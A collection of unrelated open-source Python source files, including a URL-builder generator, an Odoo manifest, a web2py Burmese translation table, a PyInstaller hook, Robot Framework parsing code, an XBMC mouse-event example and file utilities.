} for is_dynamic, data in rule._trace]
rule_converters = {}
for key, converter in iteritems(rule._converters):
js_func = js_to_url_function(converter)
try:
index = converters.index(js_func)
except ValueError:
converters.append(js_func)
index = len(converters) - 1
rule_converters[key] = index
rules.append({
u'endpoint': rule.endpoint,
u'arguments': list(rule.arguments),
u'converters': rule_converters,
u'trace': trace,
u'defaults': rule.defaults
})
return render_template(name_parts=name and name.split('.') or [],
rules=dumps(rules),
converters=converters)
def generate_adapter(adapter, name='url_for', map_name='url_map'):
"""Generates the url building function for a map."""
values = {
u'server_name': dumps(adapter.server_name),
u'script_name': dumps(adapter.script_name),
u'subdomain': dumps(adapter.subdomain),
u'url_scheme': dumps(adapter.url_scheme),
u'name': name,
u'map_name': map_name
}
return u'''\
var %(name)s = %(map_name)s(
%(server_name)s,
%(script_name)s,
%(subdomain)s,
%(url_scheme)s
);''' % values
def js_to_url_function(converter):
"""Get the JavaScript converter function from a rule."""
if hasattr(converter, 'js_to_url_function'):
data = converter.js_to_url_function()
else:
for cls in getmro(type(converter)):
if cls in js_to_url_functions:
data = js_to_url_functions[cls](converter)
break
else:
return 'encodeURIComponent'
return '(function(value) { %s })' % data
def NumberConverter_js_to_url(conv):
if conv.fixed_digits:
return u'''\
var result = value.toString();
while (result.length < %s)
result = '0' + result;
return result;''' % conv.fixed_digits
return u'return value.toString();'
js_to_url_functions = {
NumberConverter: NumberConverter_js_to_url
}
|
erkrishna9/odoo | refs/heads/master | addons/website_event/__openerp__.py | 68 | # -*- coding: utf-8 -*-
{
'name': 'Online Events',
'category': 'Website',
'summary': 'Schedule, Promote and Sell Events',
'version': '1.0',
'description': """
Online Events
""",
'author': 'OpenERP SA',
'depends': ['website', 'website_partner', 'website_mail', 'event'],
'data': [
'data/event_data.xml',
'views/website_event.xml',
'views/website_event_sale_backend.xml',
'security/ir.model.access.csv',
'security/website_event.xml',
],
'qweb': ['static/src/xml/*.xml'],
'demo': [
'data/event_demo.xml'
],
'installable': True,
'application': True,
}
|
InstitutoPascal/Staff | refs/heads/master | languages/my-mm.py | 85 | # -*- coding: utf-8 -*-
{
'!langcode!': 'my-mm',
'!langname!': 'မြန်မာ',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN',
'%s %%{row} deleted': '%s %%{row} ဖျက်ပြီးပြီ',
'%s %%{row} updated': '%s %%{row} ပြင်ပြီးပြီ',
'%s selected': '%s ခု ရွေးထားသည်',
'%Y-%m-%d': '%Y-%m-%d',
'%Y-%m-%d %H:%M:%S': '%Y-%m-%d %H:%M:%S',
'(requires internet access, experimental)': '(requires internet access, experimental)',
'(something like "it-it")': '(something like "it-it")',
'@markmin\x01An error occured, please [[reload %s]] the page': 'An error occured, please [[reload %s]] the page',
'About': 'အကြောင်း',
'Access Control': 'အသုံးပြု ခြင်းဆိုင်ရာ ထိန်းချုပ်ရန်',
'Additional code for your application': 'Additional code for your application',
'Admin language': 'Admin language',
'administrative interface': 'administrative interface',
'Administrative Interface': 'စီမံခန့်ခွဲရာ အင်တာဖေ့စ်',
'Administrator Password:': 'Administrator Password:',
'Ajax Recipes': 'Ajax Recipes',
'and rename it:': 'and rename it:',
'appadmin is disabled because insecure channel': 'စိတ်မချရသော လမ်းကြောင်းမှ ဝင်ရောက်သဖြင့် appadmin ကို အသုံးပြု၍ မရပါ',
'Application name:': 'Application name:',
'are not used': 'အသုံးမပြုပါ',
'are not used yet': 'အသုံးမပြုသေးပါ',
'Are you sure you want to delete this object?': 'သင် ဒီအရာ ဖျက်ရန် သေချာပါသလား။',
'Available Databases and Tables': 'အသုံးပြုနိုင်သော ဒေတာဘေစ့်များနှင့် ဇယားများ',
'Buy this book': 'ဒီစာအုပ်ကို ဝယ်ပါ',
'cache': 'cache',
'Cache': 'Cache',
'Cache Keys': 'Cache Keys',
'can be a git repo': 'can be a git repo',
'Cannot be empty': 'အလွတ် မဖြစ်ရပါ',
'Change admin password': 'Change admin password',
'Check to delete': 'ဖျက်ရန် စစ်ဆေးပါ',
'Checking for upgrades...': 'အဆင့်မြှင့်တင်မှုများအတွက် စစ်ဆေးနေသည် ...',
'Clean': 'ရှင်းလင်းရန်',
'Clear CACHE?': 'CACHE ကို ရှင်းလင်းမည်မှာ ဟုတ်ပါသလား။',
'Clear DISK': 'DISK ကို ရှင်းလင်းမည်။',
'Clear RAM': 'RAM ကို ရှင်းလင်းမည်။',
'Client IP': 'Client IP',
'collapse/expand all': 'collapse/expand all',
'Community': 'အသိုင်းအဝိုင်း',
'Compile': 'Compile',
'Components and Plugins': 'Components and Plugins',
'Controller': 'ကွန်ထရိုလာ',
'Controllers': 'ကွန်ထရိုလာများ',
'controllers': 'controllers',
'Copyright': 'မူပိုင်ခွင့်',
'Create': 'ဖန်တီးရန်',
'create file with filename:': 'create file with filename:',
'Create/Upload': 'Create/Upload',
'created by': 'ဖန်းတီးသူ',
'Created By': 'ပြုလုပ်ဖန်တီးသူ',
'Created On': 'ပြုလုပ်ဖန်တီးသည့်အချိန်',
'crontab': 'crontab',
'Current request': 'Current request',
'Current response': 'Current response',
'Current session': 'Current session',
'currently running': 'လက်ရှိတွင် လုပ်ဆောင်နေသည်',
'data uploaded': 'data uploaded',
'Database': 'ဒေတာဘေစ့်',
'Database %s select': 'Database %s select',
'database administration': 'ဒေတာဘေ့(စ်) စီမံခန့်ခွဲခြင်း',
'Database Administration (appadmin)': 'ဒေတာဘေစ့် စီမံခန့်ခွဲခြင်း (appadmin)',
'db': 'db',
'DB Model': 'DB Model',
'Debug': 'အမှားရှာရန်',
'Delete this file (you will be asked to confirm deletion)': 'Delete this file (you will be asked to confirm deletion)',
'Delete:': 'Delete:',
'Demo': 'အစမ်း၊ သရုပ်ပြမှုများ',
'Deploy': 'Deploy',
'Deploy on Google App Engine': 'Deploy on Google App Engine',
'Deploy to OpenShift': 'Deploy to OpenShift',
'Deployment Recipes': 'Deployment Recipes',
'Description': 'ဖော်ပြချက်',
'design': 'design',
'direction: ltr': 'direction: ltr',
'Disable': 'ပိတ်ရန်',
'DISK': 'DISK',
'Disk Cache Keys': 'Disk Cache Keys',
'Disk Cleared': 'Disk ရှင်းလင်းပြီးပြီ',
'Documentation': 'စာရွက်စာတမ်း အထောက်အကူများ',
"Don't know what to do?": 'ဘာလုပ်ရမည်မသိ ဖြစ်နေပါသလား။',
'done!': 'လုပ်ငန်း ဆောင်ရွက်ပြီးပြီ!',
'Download': 'Download',
'Download layouts from repository': 'Download layouts from repository',
'Download plugins from repository': 'Download plugins from repository',
'E-mail': 'အီးမေးလ်',
'Edit': 'ပြင်ဆင်ရန်',
'Edit application': 'Application ကို ပြင်ရန်',
'Edit current record': 'လက်ရှိ မှတ်တမ်းကို ပြင်ရန်',
'Email and SMS': 'အီးမေးလ်နှင့် SMS',
'Enable': 'ဖွင့်ရန်',
'enter an integer between %(min)g and %(max)g': 'enter an integer between %(min)g and %(max)g',
'Errors': 'အမှားများ',
'export as csv file': ' csv file အနေနဲ့ ထုတ်ပေးရန်',
'exposes': 'exposes',
'extends': 'extends',
'FAQ': 'ဖြစ်လေ့ရှိသော ပြဿနာများ',
'filter': 'filter',
'First name': 'အမည်၏ ပထမဆုံး စာလုံး',
'Forms and Validators': 'Forms and Validators',
'Free Applications': 'အခမဲ့ Applications',
'graph model': 'graph model',
'Graph Model': 'Graph Model',
'Group ID': 'Group ID',
'Groups': 'အဖွဲ့များ',
'Hello World': 'မင်္ဂလာပါ ကမ္ဘာကြီး။',
'Help': 'အကူအညီ',
'Home': 'မူလသို့',
'How did you get here?': 'သင် ဘယ်လို ရောက်လာခဲ့သလဲ။',
'import': 'သွင်းယူရန်',
'Import/Export': 'သွင်းယူရန်/ထုတ်ယူရန်',
'includes': 'includes',
'Install': 'Install',
'Installed applications': 'ထည့်သွင်းပြီး application များ',
'Internal State': 'Internal State',
'Introduction': 'မိတ်ဆက်',
'Invalid email': 'အီးမေးလ် ဖြည့်သွင်းမှုမှားနေသည်',
'Invalid Query': 'Invalid Query',
'invalid request': 'invalid request',
'Is Active': 'Is Active',
'Key': 'Key',
'Language': 'ဘာသာစကား',
'languages': 'ဘာသာစကားများ',
'Languages': 'ဘာသာစကားများ',
'Last name': 'မျိုးနွယ်အမည်',
'Layout': 'အပြင်အဆင်',
'Layout Plugins': 'Layout Plugins',
'Layouts': 'အပြင်အဆင်များ',
'Live Chat': 'တိုက်ရိုက် ဆက်သွယ် ပြောကြားရန်',
'Login': 'ဝင်ရောက်အသုံးပြုရန်',
'Login to the Administrative Interface': 'Login to the Administrative Interface',
'Logout': 'ထွက်ရန်',
'Lost Password': 'စကားဝှက် မသိတော့ပါ',
'Lost password?': 'စကားဝှက် မသိတော့ဘူးလား။',
'Manage': 'စီမံခန့်ခွဲရန်',
'Manage %(action)s': '%(action)s ကို စီမံရန်',
'Manage Access Control': 'အသုံးပြုခြင်းဆိုင်ရာ ထိန်းချုပ်မှု စီမံခန့်ခွဲရန်',
'Manage Cache': 'Manage Cache',
'Memberships': 'အသင်းဝင်များ',
'Menu Model': 'Menu Model',
'models': 'models',
'Models': 'Models',
'Modified By': 'ပြင်ဆင်မွမ်းမံသူ',
'Modified On': 'ပြင်ဆင်မွမ်းမံသည့် အချိန်',
'Modules': 'Modules',
'modules': 'modules',
'My Sites': 'ကျွန်ုပ်၏ Site များ',
'Name': 'အမည်',
'New application wizard': 'New application wizard',
'New Record': 'မှတ်တမ်း အသစ်',
'new record inserted': 'မှတ်တမ်း အသစ် ဖြည့်သွင်းပြီးပြီ',
'New simple application': 'ရိုးရိုး application အသစ်',
'next %s rows': 'နောက်အတန်း %s တန်း',
'No databases in this application': 'ဒီ application တွင် မည်သည့် ဒေတာဘေစ့်မှ မရှိပါ',
'no package selected': 'no package selected',
'Object or table name': 'Object or table name',
'Online examples': 'အွန်လိုင်း နမူနာများ',
'or alternatively': 'or alternatively',
'Or Get from URL:': 'Or Get from URL:',
'or import from csv file': 'or import from csv file',
'Origin': 'မူလ အစ',
'Other Plugins': 'အခြား Plugins',
'Other Recipes': 'အခြား Recipes',
'Overview': 'အပေါ်ယံရှုမြင်ခြင်း',
'Overwrite installed app': 'Overwrite installed app',
'Pack all': 'အားလုံးကို ထုပ်ပိုးရန်',
'Pack custom': 'ရွေးချယ်ထုပ်ပိုးရန်',
'Password': 'စကားဝှက်',
"Password fields don't match": 'စကားဝှက်များ ကိုက်ညီမှု မရှိပါ',
'Permission': 'ခွင့်ပြုချက်',
'Permissions': 'ခွင့်ပြုချက်များ',
'please input your password again': 'ကျေးဇူးပြု၍ စကားဝှက်ကို ထပ်မံ ဖြည့်သွင်းပေးပါ',
'Plugins': 'Plugins',
'plugins': 'plugins',
'Plural-Forms:': 'Plural-Forms:',
'Powered by': 'အားဖြည့်စွမ်းအားပေးသူ',
'Preface': 'နိဒါန်း',
'previous %s rows': 'previous %s rows',
'Private files': 'Private files',
'private files': 'private files',
'pygraphviz library not found': 'pygraphviz library ကို မတွေ့ပါ',
'Python': 'Python',
'Query:': 'Query:',
'Quick Examples': 'အမြန် အသုံးပြုနိုင်သော နမူနာများ',
'RAM': 'RAM',
'RAM Cache Keys': 'RAM Cache Keys',
'Ram Cleared': 'Ram ရှင်းလင်းပြီးပြီ',
'Recipes': 'Recipes',
'Record': 'မှတ်တမ်း',
'record does not exist': 'မှတ်တမ်း မရှိပါ',
'Record ID': 'Record ID',
'Record id': 'Record id',
'Register': 'မှတ်ပုံတင်ရန်',
'Registration identifier': 'Registration identifier',
'Registration key': 'Registration key',
'Reload routes': 'Reload routes',
'Remember me (for 30 days)': 'Remember me (for 30 days)',
'Request reset password': 'စကားဝှက် အသစ် တောင်းဆိုရန်',
'Reset Password key': 'Reset Password key',
'Role': 'Role',
'Roles': 'Roles',
'Rows in Table': 'Rows in Table',
'Rows selected': 'ရွေးထားသော အတန်းများ',
"Run tests in this file (to run all files, you may also use the button labelled 'test')": "Run tests in this file (to run all files, you may also use the button labelled 'test')",
'Running on %s': 'Running on %s',
'Save model as...': 'Save model as...',
'Semantic': 'Semantic',
'Services': 'Services',
'shell': 'shell',
'Site': 'Site',
'Size of cache:': 'Size of cache:',
'Start wizard': 'Start wizard',
'state': 'state',
'static': 'static',
'Static': 'Static',
'Statistics': 'ကိန်းဂဏန်း အချက်အလက်များ',
'Stylesheet': 'Stylesheet',
'submit': 'ပြုလုပ်ပါ',
'Submit': 'Submit',
'Support': 'အထောက်အပံ့',
'Table': 'ဇယား',
'test': 'test',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': 'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.',
'The application logic, each URL path is mapped in one exposed function in the controller': 'The application logic, each URL path is mapped in one exposed function in the controller',
'The Core': 'The Core',
'The data representation, define database tables and sets': 'The data representation, define database tables and sets',
'The output of the file is a dictionary that was rendered by the view %s': 'The output of the file is a dictionary that was rendered by the view %s',
'The presentations layer, views are also known as templates': 'The presentations layer, views are also known as templates',
'The Views': 'The Views',
'There are no plugins': 'There are no plugins',
'There are no private files': 'There are no private files',
'These files are not served, they are only available from within your app': 'These files are not served, they are only available from within your app',
'These files are served without processing, your images go here': 'These files are served without processing, your images go here',
'This App': 'ဒီ App',
'This email already has an account': 'ဒီအီးမေးလ်တွင် အကောင့် ရှိပြီး ဖြစ်ပါသည်',
'Time in Cache (h:m:s)': 'Time in Cache (h:m:s)',
'Timestamp': 'Timestamp',
'To create a plugin, name a file/folder plugin_[name]': 'To create a plugin, name a file/folder plugin_[name]',
'Traceback': 'Traceback',
'Translation strings for the application': 'Translation strings for the application',
'Try the mobile interface': 'Try the mobile interface',
'Twitter': 'Twitter',
'unable to parse csv file': 'unable to parse csv file',
'Uninstall': 'Uninstall',
'update all languages': 'update all languages',
'Update:': 'Update:',
'Upload': 'Upload',
'Upload a package:': 'Upload a package:',
'Upload and install packed application': 'Upload and install packed application',
'upload file:': 'upload file:',
'upload plugin file:': 'upload plugin file:',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.',
'User': 'အသုံးပြုသူ',
'User ID': 'User ID',
'Users': 'အသုံးပြုသူများ',
'Verify Password': 'စကားဝှက်ကို အတည်ပြုပါ',
'Version': 'Version',
'Versioning': 'Versioning',
'Videos': 'ဗွီဒီယိုများ',
'View': 'ဗျူး',
'views': 'views',
'Views': 'ဗျူးများ',
'Web Framework': 'Web Framework',
'Welcome': 'ကြိုဆိုပါ၏',
'Welcome to web2py!': 'web2py မှ ကြိုဆိုပါသည်။',
'Which called the function %s located in the file %s': 'Which called the function %s located in the file %s',
'Working...': 'ဆောင်ရွက်နေပါသည် ။ ။ ။',
'You are successfully running web2py': 'သင်သည် web2py ကို အောင်မြင်စွာ လည်ပတ်မောင်းနှင်စေပါသည်။',
'You can modify this application and adapt it to your needs': 'သင် ဒီ application ကို ပြုပြင်မွမ်းမံနိုင်ပါသည်။ ထို့အပြင် သင့်လိုအပ်ချက်များနှင့် ကိုက်ညီစေရန် ပြုလုပ်နိုင်ပါသည်။',
'You visited the url %s': 'သင် လည်ပတ်ခဲ့သော URL %s',
'စကားဝှက် အသစ် တောင်းဆိုရန်': 'စကားဝှက် အသစ် တောင်းဆိုရန်',
'မှတ်ပုံတင်ရန်': 'မှတ်ပုံတင်ရန်',
'ဝင်ရောက်အသုံးပြုရန်': 'ဝင်ရောက်အသုံးပြုရန်',
}
|
akhof/PySaved | refs/heads/master | PySaved/src/PyInstaller/hooks/hook-xml.dom.py | 10 | #-----------------------------------------------------------------------------
# Copyright (c) 2013, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License with exception
# for distributing bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
attrs = [('Node', 0),
('INDEX_SIZE_ERR', 1),
('DOMSTRING_SIZE_ERR', 2),
('HIERARCHY_REQUEST_ERR', 3),
('WRONG_DOCUMENT_ERR', 4),
('INVALID_CHARACTER_ERR ', 5),
('NO_DATA_ALLOWED_ERR', 6),
('NO_MODIFICATION_ALLOWED_ERR', 7),
('NOT_FOUND_ERR', 8),
('NOT_SUPPORTED_ERR', 9),
('INUSE_ATTRIBUTE_ERR', 10),
('INVALID_STATE_ERR', 11),
('SYNTAX_ERR', 12),
('INVALID_MODIFICATION_ERR', 13),
('NAMESPACE_ERR', 14),
('INVALID_ACCESS_ERR', 15),
('DOMException', 0),
('IndexSizeErr', 0),
('DomstringSizeErr', 0),
('HierarchyRequestErr', 0),
('WrongDocumentErr', 0),
('InvalidCharacterErr', 0),
('NoDataAllowedErr', 0),
('NoModificationAllowedErr', 0),
('NotFoundErr', 0),
('NotSupportedErr', 0),
('InuseAttributeErr', 0),
('InvalidStateErr', 0),
('SyntaxErr', 0),
('InvalidModificationErr', 0),
('NamespaceErr', 0),
('InvalidAccessErr', 0),
('getDOMImplementation', 0),
('registerDOMImplementation', 0),
]
def hook(mod):
if mod.__file__.find('_xmlplus') > -1:
mod.UNSPECIFIED_EVENT_TYPE_ERR = 0
mod.FT_EXCEPTION_BASE = 1000
mod.XML_PARSE_ERR = 1001
mod.BAD_BOUNDARYPOINTS_ERR = 1
mod.INVALID_NODE_TYPE_ERR = 2
mod.EventException = None
mod.RangeException = None
mod.FtException = None
if hasattr(mod, 'DomstringSizeErr'):
del mod.DomstringSizeErr
mod.DOMStringSizeErr = None
mod.UnspecifiedEventTypeErr = None
mod.XmlParseErr = None
mod.BadBoundaryPointsErr = None
mod.InvalidNodeTypeErr = None
mod.DOMImplementation = None
mod.implementation = None
mod.XML_NAMESPACE = None
mod.XMLNS_NAMESPACE = None
mod.XHTML_NAMESPACE = None
mod.DOMExceptionStrings = None
mod.EventExceptionStrings = None
mod.FtExceptionStrings = None
mod.RangeExceptionStrings = None
return mod
|
Senseg/robotframework | refs/heads/master | src/robot/parsing/tablepopulators.py | 1 | # Copyright 2008-2012 Nokia Siemens Networks Oyj
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from robot.parsing.settings import Documentation, MetadataList
class Populator(object):
"""Explicit interface for all populators."""
def add(self, row): raise NotImplementedError()
def populate(self): raise NotImplementedError()
class CommentCacher(object):
def __init__(self):
self._init_comments()
def _init_comments(self):
self._comments = []
def add(self, comment):
self._comments.append(comment)
def consume_comments_with(self, function):
for c in self._comments:
function(c)
self._init_comments()
class _TablePopulator(Populator):
def __init__(self, table):
self._table = table
self._populator = NullPopulator()
self._comments = CommentCacher()
def add(self, row):
if self._is_cacheable_comment_row(row):
self._comments.add(row)
else:
self._add(row)
def _add(self, row):
if not self._is_continuing(row):
self._populator.populate()
self._populator = self._get_populator(row)
self._comments.consume_comments_with(self._populator.add)
self._populator.add(row)
def populate(self):
self._comments.consume_comments_with(self._populator.add)
self._populator.populate()
def _is_continuing(self, row):
return row.is_continuing() and self._populator
def _is_cacheable_comment_row(self, row):
return row.is_commented()
class SettingTablePopulator(_TablePopulator):
def _get_populator(self, row):
row.handle_old_style_metadata()
setter = self._table.get_setter(row.head)
if not setter:
return NullPopulator()
if setter.im_class is Documentation:
return DocumentationPopulator(setter)
if setter.im_class is MetadataList:
return MetadataPopulator(setter)
return SettingPopulator(setter)
class VariableTablePopulator(_TablePopulator):
def _get_populator(self, row):
return VariablePopulator(self._table.add, row.head)
class _StepContainingTablePopulator(_TablePopulator):
def _is_continuing(self, row):
return row.is_indented() and self._populator or row.is_commented()
def _is_cacheable_comment_row(self, row):
return row.is_commented() and isinstance(self._populator, NullPopulator)
class TestTablePopulator(_StepContainingTablePopulator):
def _get_populator(self, row):
return TestCasePopulator(self._table.add)
class KeywordTablePopulator(_StepContainingTablePopulator):
def _get_populator(self, row):
return UserKeywordPopulator(self._table.add)
class ForLoopPopulator(Populator):
def __init__(self, for_loop_creator):
self._for_loop_creator = for_loop_creator
self._loop = None
self._populator = NullPopulator()
self._declaration = []
def add(self, row):
dedented_row = row.dedent()
if not self._loop:
declaration_ready = self._populate_declaration(row)
if not declaration_ready:
return
self._loop = self._for_loop_creator(self._declaration)
if not row.is_continuing():
self._populator.populate()
self._populator = StepPopulator(self._loop.add_step)
self._populator.add(dedented_row)
def _populate_declaration(self, row):
if row.starts_for_loop() or row.is_continuing():
self._declaration.extend(row.dedent().data)
return False
return True
def populate(self):
if not self._loop:
self._for_loop_creator(self._declaration)
self._populator.populate()
class _TestCaseUserKeywordPopulator(Populator):
def __init__(self, test_or_uk_creator):
self._test_or_uk_creator = test_or_uk_creator
self._test_or_uk = None
self._populator = NullPopulator()
self._comments = CommentCacher()
def add(self, row):
if row.is_commented():
self._comments.add(row)
return
if not self._test_or_uk:
self._test_or_uk = self._test_or_uk_creator(row.head)
dedented_row = row.dedent()
if dedented_row:
self._handle_data_row(dedented_row)
def _handle_data_row(self, row):
if not self._continues(row):
self._populator.populate()
self._populator = self._get_populator(row)
self._flush_comments_with(self._populate_comment_row)
else:
self._flush_comments_with(self._populator.add)
self._populator.add(row)
def _populate_comment_row(self, crow):
populator = StepPopulator(self._test_or_uk.add_step)
populator.add(crow)
populator.populate()
def _flush_comments_with(self, function):
self._comments.consume_comments_with(function)
def populate(self):
self._populator.populate()
self._flush_comments_with(self._populate_comment_row)
def _get_populator(self, row):
if row.starts_test_or_user_keyword_setting():
setter = self._setting_setter(row)
if not setter:
return NullPopulator()
if setter.im_class is Documentation:
return DocumentationPopulator(setter)
return SettingPopulator(setter)
if row.starts_for_loop():
return ForLoopPopulator(self._test_or_uk.add_for_loop)
return StepPopulator(self._test_or_uk.add_step)
def _continues(self, row):
return row.is_continuing() and self._populator or \
(isinstance(self._populator, ForLoopPopulator) and row.is_indented())
def _setting_setter(self, row):
setting_name = row.test_or_user_keyword_setting_name()
return self._test_or_uk.get_setter(setting_name)
class TestCasePopulator(_TestCaseUserKeywordPopulator):
_item_type = 'test case'
class UserKeywordPopulator(_TestCaseUserKeywordPopulator):
_item_type = 'keyword'
class Comments(object):
def __init__(self):
self._comments = []
def add(self, row):
if row.comments:
self._comments.extend(c.strip() for c in row.comments if c.strip())
@property
def value(self):
return self._comments
class _PropertyPopulator(Populator):
def __init__(self, setter):
self._setter = setter
self._value = []
self._comments = Comments()
def add(self, row):
if not row.is_commented():
self._add(row)
self._comments.add(row)
def _add(self, row):
self._value.extend(row.dedent().data)
class VariablePopulator(_PropertyPopulator):
def __init__(self, setter, name):
_PropertyPopulator.__init__(self, setter)
self._name = name
def populate(self):
self._setter(self._name, self._value,
self._comments.value)
class SettingPopulator(_PropertyPopulator):
def populate(self):
self._setter(self._value, self._comments.value)
class DocumentationPopulator(_PropertyPopulator):
_end_of_line_escapes = re.compile(r'(\\+)n?$')
def populate(self):
self._setter(self._value, self._comments.value)
def _add(self, row):
self._add_to_value(row.dedent().data)
def _add_to_value(self, data):
joiner = self._row_joiner()
if joiner:
self._value.append(joiner)
self._value.append(' '.join(data))
def _row_joiner(self):
if self._is_empty():
return None
return self._joiner_based_on_eol_escapes()
def _is_empty(self):
return not self._value or \
(len(self._value) == 1 and self._value[0] == '')
def _joiner_based_on_eol_escapes(self):
match = self._end_of_line_escapes.search(self._value[-1])
if not match or len(match.group(1)) % 2 == 0:
return '\\n'
if not match.group(0).endswith('n'):
return ' '
return None
class MetadataPopulator(DocumentationPopulator):
def __init__(self, setter):
_PropertyPopulator.__init__(self, setter)
self._name = None
def populate(self):
self._setter(self._name, self._value, self._comments.value)
def _add(self, row):
data = row.dedent().data
if self._name is None:
self._name = data[0] if data else ''
data = data[1:]
self._add_to_value(data)
class StepPopulator(_PropertyPopulator):
def _add(self, row):
self._value.extend(row.data)
def populate(self):
if self._value or self._comments:
self._setter(self._value, self._comments.value)
class NullPopulator(Populator):
def add(self, row): pass
def populate(self): pass
def __nonzero__(self): return False
|
Voyager1/xbmc | refs/heads/master | tools/EventClients/examples/python/example_mouse.py | 262 | #!/usr/bin/python
# This is a simple example showing how you can send mouse movement
# events to XBMC.
# NOTE: Read the comments in 'example_button1.py' for a more detailed
# explanation.
import sys
sys.path.append("../../lib/python")
from xbmcclient import *
from socket import *
def main():
import time
import sys
host = "localhost"
port = 9777
addr = (host, port)
sock = socket(AF_INET,SOCK_DGRAM)
# First packet must be HELO and can contain an icon
packet = PacketHELO("Example Mouse", ICON_PNG,
"../../icons/mouse.png")
packet.send(sock, addr)
# wait for notification window to close (in XBMC)
time.sleep(2)
# send mouse events to take cursor from top left to bottom right of the screen
# here 0 to 65535 will map to XBMC's screen width and height.
# Specifying absolute mouse coordinates is unsupported currently.
for i in range(0, 65535, 2):
packet = PacketMOUSE(i,i)
packet.send(sock, addr)
# ok we're done, close the connection
packet = PacketBYE()
packet.send(sock, addr)
if __name__=="__main__":
main()
|
BorisJeremic/Real-ESSI-Examples | refs/heads/master | analytic_solution/test_cases/8NodeBrick/cantilever_irregular_element_with_divisions/shape3/NumberOfDivision4/vertical_load/compare_HDF5_ALL.py | 424 | #!/usr/bin/python
import h5py
import sys
import numpy as np
import os
import re
import random
# find the path to my own python function:
cur_dir=os.getcwd()
sep='test_cases'
test_DIR=cur_dir.split(sep,1)[0]
scriptDIR=test_DIR+'compare_function'
sys.path.append(scriptDIR)
# import my own function for color and comparator
from mycomparator import *
from mycolor_fun import *
# the real essi hdf5 results
h5_result_new = sys.argv[1]
h5_result_ori = sys.argv[2]
disp_pass_or_fail=h5diff_disp(h5_result_ori,h5_result_new)
Gauss_pass_or_fail = 1
try:
Gauss_pass_or_fail=h5diff_Gauss_output(h5_result_ori,h5_result_new)
except KeyError:
pass
Element_Output_pass_or_fail = 1
try:
Element_Output_pass_or_fail=h5diff_Element_output(h5_result_ori,h5_result_new)
except KeyError:
pass
if disp_pass_or_fail and Gauss_pass_or_fail and Element_Output_pass_or_fail:
print headOK(), "All hdf5 results are the same."
print headOKCASE(),"-----------Done this case!-----------------"
else:
if disp_pass_or_fail==0:
print headFailed(),"-----------Displacement has mismatches!-----------------"
if Gauss_pass_or_fail==0:
print headFailed(),"-----------StressStrain has mismatches!-----------------"
if Element_Output_pass_or_fail==0:
print headFailed(),"-----------Element output has mismatches!-----------------"
# # The allowable tolerance between the ori_vals and new_vals values.
# tolerance=1e-5
# machine_epsilon=1e-16
# ori_vals=[]
# new_vals=[]
# ori_vals.append(find_max_disp(h5_result_ori,0))
# new_vals.append(find_max_disp(h5_result_new,0))
# # if multiple steps, compare the max_disp of random steps
# Nstep = find_disp_Nstep(h5_result_ori)
# if Nstep>5 :
# for i in xrange(1,4):
# test_step=random.randint(1,Nstep-1)
# ori_vals.append(find_max_disp(h5_result_ori,test_step))
# new_vals.append(find_max_disp(h5_result_new,test_step))
# # calculate the errors
# errors=[]
# for index, x in enumerate(ori_vals):
# if(abs(x))>machine_epsilon:
# errors.append(abs((new_vals[index]-x)/x))
# else:
# errors.append(machine_epsilon)
# # compare and form the flags
# flags=[]
# for item in errors:
# if abs(item)<tolerance:
# flags.append('pass')
# else:
# flags.append('failed')
# # print the results
# case_flag=1
# print headrun() , "-----------Testing results-----------------"
# print headstep() ,'{0} {1} {2} {3}'.format('back_value ','new_value ','error ','flag')
# for index, x in enumerate(errors):
# if(abs(x)<tolerance):
# print headOK() ,'{0:e} {1:e} {2:0.2f} {3}'.format(ori_vals[index],new_vals[index], x, flags[index] )
# else:
# case_flag=0
# print headFailed() ,'{0:e} {1:e} {2:0.2f} {3}'.format(ori_vals[index],new_vals[index], x, flags[index] )
# if(case_flag==1):
# print headOKCASE(),"-----------Done this case!-----------------"
# legacy backup
# automatically find the script directory.
# sys.path.append("/home/yuan/Dropbox/3essi_self_verification/test_suite/scripts" )
# script_dir=sys.argv[1]
# print headstart() , "Running test cases..."
# print headlocation(), os.path.dirname(os.path.abspath(__file__))
# file_in=open("ori_vals_values.txt","r")
# Input the 1st line, which is the ori_vals value.
# ori_vals= float(file_in.readline())
# Input the 2nd line, which is the HDF5 output filename.
# new_vals=find_max_disp(file_in.readline());
# file_in.close() |
Coelhon/MasterRepo.repository | refs/heads/master | plugin.video.SportsDevil-2016.12.31/lib/utils/fileUtils.py | 15 | # -*- coding: utf-8 -*-
import os
import datetime, time
import random
import hashlib
import codecs
#######################################
# File Helpers
#######################################
def fileExists(filename):
return os.path.isfile(filename)
def getFileExtension(filename):
ext_pos = filename.rfind('.')
if ext_pos != -1:
return filename[ext_pos+1:]
else:
return ''
def get_immediate_subdirectories(directory):
return [name for name in os.listdir(directory)
if os.path.isdir(os.path.join(directory, name))]
def findInSubdirectory(filename, subdirectory=''):
if subdirectory:
path = subdirectory
else:
path = os.getcwd()
for root, _, names in os.walk(path):
if filename in names:
return os.path.join(root, filename)
raise 'File not found'
def cleanFilename(s):
if not s:
return ''
badchars = '\\/:*?\"<>|'
for c in badchars:
s = s.replace(c, '')
return s;
def randomFilename(directory, chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', length = 8, prefix = '', suffix = '', attempts = 10000):
for _ in range(attempts):
filename = ''.join([random.choice(chars) for _ in range(length)])
filename = prefix + filename + suffix
if not os.path.exists(os.path.join(directory, filename)):
return filename
return None
def getFileContent(filename):
try:
f = codecs.open(filename,'r','utf-8')
txt = f.read()
f.close()
return txt
except:
return ''
